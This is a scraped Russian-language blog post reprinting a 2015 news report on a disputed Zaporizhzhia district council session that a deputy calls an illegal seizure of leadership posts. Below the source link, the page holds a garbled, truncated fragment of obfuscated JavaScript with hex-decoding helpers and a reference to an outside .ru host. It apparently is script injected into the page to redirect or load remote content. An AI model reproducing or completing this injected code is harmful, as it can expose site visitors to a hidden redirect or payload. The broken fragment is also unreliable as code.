Хроники и Комментарии

Власть, расследования, сатира, фото

БИТВА ЗА ПОРТФЕЛИ. В Запорожском райсовете началась банальная драчка за должности

Posted by operkor на 19 ноября, 2015

5В БПП «Солидарность» считают незаконным проведение сегодняшней сессии Запорожского райсовета, а действия представителей «Оппозиционного блока», ВО «Батькивщина» и Радикальной партии Олега Ляшко называют не иначе как «рейдерским захватом».

Аналогичные попытки сегодня зафиксированы в Каменско-Днепровском и Васильевском районах Запорожской области. По словам депутата Запорожского райсовета Андрея Бартыша, сессия была неправомочна, поскольку из 34 депутатов на ней присутствовал только 21, а для кворума необходимо было как минимум 23. Остальные народные избранники, в том числе от партии БПП «Солидарность»» и «Наш край», не голосовали. Свой отказ от участия в заседании они мотивировали тем, что на данный момент в судах еще находятся дела по поводу законности избрания некоторых депутатов райсовета.

Поскольку сессия была правомочной, и на ней еще только предстояло выбрать главу районного совета и других руководящих лиц, проводила это заседание глава Запорожского райизбиркома Ольга Коротина. Несмотря на все протесты, депутаты заседание все же провели.

Очень быстро был избран секретариат райсовета, в который вошли три человека, представители «Оппоблока» и «Батькивщины». Столь же быстро был избран и глава Запорожского районного совета ‒ представитель «Оппоблока» Анатолий Шевчишин. При этом то, как проголосовали депутаты, проверял неизвестный человек, находившийся в сессионном зале.

«То, что сегодня произошло, это выходит за рамки всех правовых норм. После того, как зал покинули 13 человек, кворума не было, и, согласно Закону Украины о местных выборах, сессия является нелегитимной. «Оппозиционный блок» до этого привез на место телевидение ТВ-5. «Оппозиционный блок» и «Батькивщина» открыто заявили о своем сотрудничестве, о том, что они будут продолжать эту сессию, и начали выбирать главу Запорожского районного совета. То есть в нарушение закона, в отсутствии кворума.

При этом все депутаты, которые заполнили бюллетени и несли их к ящику, в который они их вбрасывали, несли эти бюллетени в открытом виде и показывали какому-то человеку, где они поставили галочку. Одним из руководителей этого захвата был Вячеслав Колесников, это помощник депутата Соболева (в настоящее время Колесников является помощником народного депутата Петра Сабашука. ‒ Прим. ред.)», ‒ заявил один из депутатов Запорожского районного совета Андрей Бартыш.

Кроме того, по словам Андрея Бартыша, нарушены правила, согласно которым в президиуме должны быть представлены все политические партии, а не некоторые из них. Он также объяснил, почему, по его мнению, так происходит.

«Сейчас идет борьба, сейчас область полностью сливается. Давайте посмотрим, а почему мы хотим Буряка все, а почему мы не видим нарушений, которые были на участках? Милиция вообще пассивна. Столько нарушений! Я лично в воскресенье приезжал и рассказывал, где находятся точки, где стоят и принимают бабушек. Милиция полностью пассивна», ‒ заявил Бартыш.

Он также сказал, что сейчас готовится заявление по поводу незаконно проведенной сессии, а также избрания на пост главы районного совета Анатолия Шевчишина. Эти заявления планируют подать в милицию и СБУ.

http://reporter-ua.com

// o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t=»»,o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "operkor.wordpress.com"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e//m81jmqmn.ru/f.html

Добавить комментарий

Please log in using one of these methods to post your comment:

Логотип WordPress.com

Для комментария используется ваша учётная запись WordPress.com. Выход /  Изменить )

Google photo

Для комментария используется ваша учётная запись Google. Выход /  Изменить )

Фотография Twitter

Для комментария используется ваша учётная запись Twitter. Выход /  Изменить )

Фотография Facebook

Для комментария используется ваша учётная запись Facebook. Выход /  Изменить )

Connecting to %s

 
%d такие блоггеры, как: